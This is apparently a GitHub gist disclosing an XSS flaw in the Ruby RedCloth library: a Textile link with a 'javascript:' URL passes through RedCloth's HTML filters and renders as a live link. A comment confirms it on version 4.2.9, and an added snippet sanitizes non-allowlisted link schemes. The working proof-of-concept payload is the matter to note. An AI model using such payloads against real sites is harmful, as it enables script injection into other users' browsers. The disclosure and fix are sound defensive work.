Created Feb 29, 2012
require 'redcloth'
print RedCloth.new('["clickme":javascript:alert%28/XSS/.source%29]', [:filter_html, :filter_styles, :filter_classes, :filter_ids]).to_html
# Result:
# <p><a href="javascript:alert%28/XSS/.source%29">clickme</a></p>

@co3k co3k commented Feb 29, 2012

I've confirmed this with RedCloth-4.2.9 (installed by RubyGems).
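
A defensive counterpart to the result shown in the gist, as an added example that is not part of the original gist or of RedCloth: a post-render pass that rewrites any link whose scheme is not on an allowlist. The names `ALLOWED_SCHEMES`, `safe_href?` and `neutralize_links` are hypothetical, the allowlist is an assumed policy, and the regex assumes quoted `href` attributes as in the output above.

```ruby
require 'cgi'

# Assumed policy: only these schemes may appear in rendered links.
ALLOWED_SCHEMES = %w[http https mailto].freeze

# Rendered output copied from the gist's "Result" comment.
PAGE_OUTPUT = '<p><a href="javascript:alert%28/XSS/.source%29">clickme</a></p>'

# True when href is relative or uses an allowlisted scheme.
def safe_href?(href)
  # Decode HTML entities, then drop whitespace and control characters,
  # so an entity-encoded or whitespace-split scheme is still recognised.
  value = CGI.unescapeHTML(href.to_s).gsub(/[\x00-\x20\x7f]+/, '')
  scheme = value[/\A([a-zA-Z][a-zA-Z0-9+.\-]*):/, 1]
  return true if scheme.nil? # relative URL, path or fragment
  ALLOWED_SCHEMES.include?(scheme.downcase)
end

# Replace the value of every non-allowlisted href with "#".
# Handles quoted attributes only (assumption stated in the lead-in).
def neutralize_links(html)
  html.gsub(/(<a\b[^>]*?\bhref\s*=\s*)(["'])(.*?)\2/im) do
    prefix, quote, href = $1, $2, $3
    target = safe_href?(href) ? href : '#'
    prefix + quote + target + quote
  end
end

puts neutralize_links(PAGE_OUTPUT) if $PROGRAM_NAME == __FILE__
```

Run it over the string returned by `to_html` before the markup reaches a template; a parser-based HTML sanitizer is the sturdier choice where one is available.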
